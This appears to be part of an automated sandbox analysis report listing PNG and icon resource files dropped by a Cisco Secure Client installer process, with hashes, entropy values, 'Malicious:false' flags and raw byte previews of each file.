                                                                                                                                      SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                      MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                      SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                      SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                      SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....Q?.....!.._..t]..$.*`W@..Z.......]..h..B.n...j/.R.~..P`..+*A..-J...o..u....9..3s...7....+y.3.<.<..%....5.....Sv.o?9p.....=..t....~./,]ID.>....O.p9.T.6.I/*.......s'O...}.....QkS].y36."..P.../f...E..Y....n.h.K.uN2..*zn.....M...Y.n?.....V(G......o6.....n.G6........O~ai...hn+....s..3...3...........X0.t..o....Gr.w...../{.l....3"..d#s..]..S^...x.7\.xtk7.k....f..8.....MMM.......At...'.t1......c}...k.....U....b]dW.=.k.=.o..a...o....v &T....-j....q.o.5=....w.2.v.&U.37F..WG...vn....l......S...g`'./.|Z....lSP.....ji...N.<..6f.u^.v..l;)F...$.....E81..F7.i..h.+.2~3.SBD..w.q/...z+.?..........^.S.(.3f..N.......km..v....#.H7..S&0J/._XZ@D...t2a.........tD..#..]"s...J....|M....?..tLH....&.8.|t.H.\/..O|C....":..E)Q.R.....<?...M.}............1..3.....]5.w+....W.>7. .j..>..,b8..c..v.E..........;.\.:];.I.S..CE...c..._...........r./e..C...t..7.yLJ..{_.z........W<E;f^g....O2..>|.n...o..7Q.d.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-1H634.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2860
                                                                                                                                      Entropy (8bit):7.914852791051157
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                      MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                      SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                      SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                      SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\.L......E.ki....`S.uB&HRP......E7.5.f.K.t.e....lV..ve.M'..@..."..t).U.R.(r@I....^.......;...._B.......w..{..y...Q.a.df......G3.T......&.....`.q..2Z2..h3...Q.....d..*q..b..?.9}......6...I5DT.7u....B..i...._.........\.>..........U..r.=.]....rb. !'{-m...DO..N.\....,.'.TO.t!..X...(';]......KT.N.pE]..1AFK&\.(.%.....!iK...^;V%..6.u..CB...Jh.\....f1...*.........&..2Z2!..`5.r7.+.wSlL....?.......N..@..8.M6..2h=.h..ID.bc...YRD?}....4...O.=.O..I+.....sd..d.=.o.D.&.89...WD.,=H..)z.'`...xZ.n...vD....l0Ynj!.g...C.9qd..7.....D..M:..y>Y......9.I..i.$..=....C.G..lu.....L..u.`..b.{=>Xp#).`....o.]^U.x.s56&:....*..w..rI0W'...C{uO7f.h.4i`p.!..jqR..k .L.:0\.=.n.7#K0C.U.K...X...b<}x.A .._....?.*.=..a.n....o..v=.N..9jQ.C.....kJ2.,....?v?f.A.../^h.,=.).Df.P..p....$..{Dz...C:v..t.......[G.a..>3.R...=..Z....X....}%.CV...J....p.6<......}v....T..3.5._].....c.V.~..A.z.....x./^..q....?.......9 ....5.?.Xy...s ..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-1HCTK.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.612237043911612
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                      MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                      SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                      SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                      SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ..............................................................@...@...@...@...@...@...@...@...@...@...@...@...@...@...........................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................................................P.....@...s...s...s...s...s...s...s...s...s...s...s...s...@.........P.................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................................................................X5...@...s...s...s...s...s...s...s...s...s...s...s...s...@..X5...........................................................xh.M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'...xh..............................................xh.M'..M'.......@...s...s...s...s...s...s...s...s...s...s...s...s...@..z]J.M'..M'...xh................................P........M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-1SA8G.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5803
                                                                                                                                      Entropy (8bit):7.950077949239442
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                      MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                      SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                      SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                      SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............>a.....pHYs...........~....]IDATx..]{l[.y..."-?r...:.e'K..).9.R...%h.......0..m.?.y[.a. ...x.C.6t.......N.u3.......FJ.d..Dt.%.._.%>..;<7.)..;..R...@K...=.|..}.|..h..6.h.....U2.(......c.g...<..c.1@L..[....D"....F.4..3..MM.h.N.....9-..U..e.... .."...Ad.....>*'..lF......d.0.8....4E+..O..i.V<.....5==m5.x..w.......8^.b<JD.H.....&''.Fp'./....>.6.z...MO....T*.2D....}E.e...6. .I.z....fffZ..u.>...DL.1....acW.0.2....U.{.........W.c..!%W0W=. .......U.*0F.U...e....B..b.......c.Z...JW.\.... D.#.....h4.H...W.5F.w..;'~..o."...%..l.....|.#.w.......~"....H.^V.f2.f.x<.7GGGk..u."....?...1....}.3.......d2..L.|C...k...>.wo9.b/.p.r.. k....r`.2).m.u.8.*3$.I.....$=..@3. a.f<.J...A...E./$.8.4MY....u.Sh.#.1..,A..?.BR2.g....h4.......2......S4.2..S&....!.....B.J........d..........n.}w.0..]...t.5.x............Z.s_B.Y....f...?..A!..!.&#.&...|C!GV>K..z.jh.U_..x..n2@.4............0J../...Y.sD..I7.7F.........kKD..@l....">.. .g..K|..|./.1...&@.A.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-253I4.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4267
                                                                                                                                      Entropy (8bit):7.94257084168463
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                      MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                      SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                      SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                      SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...MIDATx..Zyl..u.s......x..$J.i).l.......6..8.k.h`....(Z.UZ.Q.-....4n...l...6r.@r.#J.K.M..O.7w.......{..R.E.....@.vvw...{..~..~....u7.).......Np..r..K.(f..%!.LB1k....p.......E..l.........x.."{$.Wl..hY.lAO.R..B*>d....c...D?.........*.......=...[....N....;.|..d.T.&..q..."....I...pi8...?...6...s.R.....z.......U5.pM{.j..C..k..wW.....W.e..X.....9"...Q.@.y.G.,.x<....Y...]....\.wn.........YsI..+.....m.?.o..^...`@:]...w#.sv....x....@..0As....!...j.^.q.~..G..z~x....q.....J..a......6=td.=.M..Z.k*..,.#......i.......xP......S.A. o.y.`A*.C.i%..5~......_.Y.?/.%.=z..dr...N..X.lz.....|......x.s6.d.". ........l....@Te.C.)..E..@..%.$..e.&..r..g...9.]k}.t..R...%..6..{............G^.o....F.!.F..Ar*`.<....L...&......S..y|..,$.Yp......A.X.t..N..q.....d.p0.A[S....m...2.g..nr...U...../.vu.........Z".Cl6.....Dt...s2.....l.`.(Z.x.2h...3.f....M.<.F.H)......q.H..p...n.M.......T..._..v?..5(x....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-2IBU8.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10811
                                                                                                                                      Entropy (8bit):7.9725003667897125
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                      MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                      SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                      SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                      SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx............`....L)VT.U..Id.`*....jt.$.M...`m.........+.T4..8.....d3...^..R1.Q.K.5+. [.....sN..}.q.._...........$+.D..Rm.O..`./..=..?"........n..(.T.6.I.......sg|......K............x...p'.V.....6.........w..d..v...S.Yiu ..xf..*..!7."t.0........F.;u...3.y...........\...Yy..g...w...........=..J{.7..G.<..>..I."........Lwv..s..V..[.;.v0v...].....o............'..e....9=....?(........g~~O.@*..........|<.A..t..o.....f......K.z.'...}F*p.... ..9x.......U...e..m..;...R.@x..^...Mas.Y.=.?\..{.us.. .Z.o:..L..q.Q.>.?.........1ET..5.|....`.P...AF6_.R|.=.{......B......w..s..k.%3.....3R....3H....&._1.L8.,ydq;y.c....6..7B..+.8..l.'=HR...Y.!j..<...=.>.<.x .w..M..._,.x0....q.,.LB. ....6.yxh....\B._..\..E..k..}..o}....[.6/...0z1.......v.D.s3..L.LV..%.MJ$;P.v.\.=..L...J..$......./....H.....x^.m...l/-.....<.-,..e..cD...;>g....0..Z...n..@.0BZ.3..x......,.9..?}.....d.....H...#_.....S2QZ.._

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-2SQKM.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.5904244181066343
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                      MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                      SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                      SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                      SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ..........................@...@...@...@...@...@...@...@...@...@...@...@...@...@.........................p...0.............................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................p.....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'..M'..M'..M'..nP:...w................`.............................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..z]J.z]J.X5..M'..M'..M'..M'..z]J......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................nP:.M'..M'..M'...................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................M'..M'..M'..M'...xh..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................cB+.M'..z]J.M'..M'...xh......................@...s...s...s...s...s...s

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-33RLT.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13810
                                                                                                                                      Entropy (8bit):7.9753795366170355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                      MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                      SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                      SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                      SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....B.R .w4..-.p-b..o".....`U.R+.+..=..<....J.b...."..U...ATD.....R....G. ..Nf.k.^k..k.%........3..o}..T...y........Pkt......r..wj_.~z...^....l|2....L._...>.I.../..^...N.6.$...:Q.N.iK.........V...X%N&.[Q.-c'....W.p,~U..-...S.....N.z~.w. .....;..<..>.?..._oK....w......3..[U[.....o.?..U.>.[...lR...D...u.w.../n.Y...{.x8O...M,......;.d<..1.._7).D&`.....N..3jx.g.S.[....N.n#..^?H...x.'.^}.i......_H.....I~1..;.S....;;.......x.w...............~@oly.;....F..]...i.?.P.6m..Q...#%.%...$<.p..W]...'.A....._uL;.o......_~.>........L..O.}..b....I.Gae.n....U..Y.6m.....+.-4.;.].............p...A..g.../...N..+(.$...n..S..&.....\z...]..y..v...?[...=.NZ.\.*...#.J***f.q`#..*H..W.45.V.{...G..<IT..'K.f*;Q.Vz.....u7.W";AT....1.-_.$.'d...-.<.c^o%::..L.%N<.+sLVc,.q.^'..i5&*/.6.....i*...Y.N......4$.!(...p1..6U..._.8....#{g.A..@.R.#..)........i............ ..F..S.......Qf.~..u..9......M..cN:.7F'..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-47DB0.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):291
                                                                                                                                      Entropy (8bit):6.344520469543007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                      MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                      SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                      SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                      SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............}\.....gAMA......a.....pHYs...........~.....tIME........w.e....tEXtComment.Created with GIMPW.......tEXtSoftware.Paint.NET v3.5.100.r....gIDATHKc`...!@........0.a|Rh..r....0E0>)4.}=..t.....0W....x}......a.`|R...dTw..........B.u..-.z...8.C..^...Y.......IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-4MEA7.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1807
                                                                                                                                      Entropy (8bit):7.846793911413473
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                      MD5:536C911881523B9F8402A481881992A0
                                                                                                                                      SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                      SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                      SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..;R#I..k.........1...h.@'..:.V...1'.q..kM...Ly..h..6J.=....Y.%E~...!..wVe... .. .. .. ....O;....I..UO...........R.........7...E)5W.d...Q.)J5.7\{....Q.W.P.R.a.@.*K......ab...Q.d..zV....^..m.C.t..U.Y.e..(.....x.J)...s.....)..XM....Y.._~Q......o#..........=.p+b.E..X..X.}.'..o...DJw..GJq.].^.%R.#..3.y<.s...5.......s.s....;>.Z.q.F./..r.Z...T..=.&H......z...~J/.%.....(.~.|R7...z.LV....+.........T....|L.1i<..Zc.]LO.;.@.:.?IU./..A.,.-.rGr!Z...'I.........6+^......a....n6~e6ejy.f.........\UC..\..i..s.r.U_.i..>......u...p...zb5..t|u.h.*gxD..}6T[i.jxO./..goc...9......(.[..........*.{.8.f.(..R..J8.za.;.t..aj./.5.^px....g[...]z...=.Q.Q.%.D...z2`.;.6.K9.26Tc'....)_...$..<.&.7v.....pQ..N....s.c...XX..x.>..O.....)&/IYm..=....7.A.......c$..R....T{.q......C..@.L.....]({..>y.:.e.#....ym.....g^.R.....v.$.M.B.E....^.xSF80......n|Ph./..%<.I...X.f..=.pz..~...a..O1.9g.m.Mp....n.v%D....w....F6.....{.".!.~.}..}.P.S.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-4QR42.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3683
                                                                                                                                      Entropy (8bit):7.90204028759812
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                      MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                      SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                      SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                      SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-5APTH.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1702
                                                                                                                                      Entropy (8bit):7.836409910643584
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                      MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                      SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                      SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                      SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...XIDATx..=R.X..{w.l8..8#..-...f.'.9...lhs.)...N`q...!...=.I7.zz-F.H..7._.U.3#.^.[..Z..(..(..(..(..l).e}YE9.....U.[qy..W)Ei....GP-*A...=G......b....R\..R.h..}.]W.>T...Pt.j).Vp.,...*..y1c.......jx...W(Zr....xv.|9..%....$g5.Z.'$.r .......7r..b.y.P.....1.(.)V..P-.Q.._)k..1.t.._....W.R.o...O.d.n................Cl....r.E...m..P...6..,.[!],.m...]..Y-v..6.j.p\c.g.2u...-Bs......k{........^V....e.F...N.u..=.Hw..1..&.....y^..i].E.B ..{.}.....n0w......1.ES..m....p.....R.Q._......gF.Gp.#..v..<~.;t.Xr.nx.bs.K.s.c..<.j#Qf.6k....x..{.....}.?;uS..{.y...y....<..9Q.c"..I;....;^N...n% .O....<.V..;......G..+E....h-....M.T-....."V..G[...S..~r...-.L"f%0@.1.Zx....0 .]d1+.Az.~.b...d.......b....Z*.......k.YZ.m.q....WX....0..G.T......]....s,.obV7..D.7h.2r..g..(<J....+..(V..*.y[.!f..Z..>..".I..t....ab.v....M9...)..U.h..M#.....JA/.VP.>......wB.......^1.....d..R..9Orm-.....R.C..%..(...d...J9#6...{TpXJp....j

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-5TV77.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2106
                                                                                                                                      Entropy (8bit):7.848629133083243
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                      MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                      SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                      SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                      SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]+s#G..K..N0P..Nf)..0... ..v......l...P*.{(.2R.Yf...*,a.U.d....3.....g.,..~N..$$$$$$$$$$$$$$$$$H..^.b6h.@W}.?.V?oc..O.....x^_...lR.A.......=[,.zX}..S.^..y...8!.@..4...i.5..l...sEHl..p........D.HA2..K.)....:...l.Ud.k.........:........p..Re.J...U.Y..9(.>...%....a..e..V........D.:J.eL..GJ6.P.....3B.kG...wgCP).?.5qH....85|.tel.q..W..=..[.u.....w.3r..k.....RR.B....$....]*.}../.@.71.s0b.bNH4=m.l.^I..`.".. 2...X...^......U..s.!d........~..;..J.f..,)..T..V3+.g%.T.G.b..K.r..=.GF...GT5.s..N.l..:.$..,!.T.......r$>.H..1...Q..}.~&..z.:.iF.}@b..mP.....!B...e..R...A(....U.#..o5&a.43..."]".._..m.......7.G..w.5q&..V.............,.+)\.;.0zw.Th....;.!..^J..-...:L.L.iM..g..Zgq.N8.qhYd.?.7...=t.iL[..B........yi..L...q8w..>..x..p.O..VY.u.s....%A.....`...*.n..L.f...6_."..R.D...8..^...>.N.J.1.;.T....-...}~.M..J.:...B..{m.L.m...>.J;.\T.=).xQ..u{...f........!.)y]lck..W^.v.T.ms...%^..,.b..]ZZ...u.^...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-890GJ.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11747
                                                                                                                                      Entropy (8bit):7.9792800328394184
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
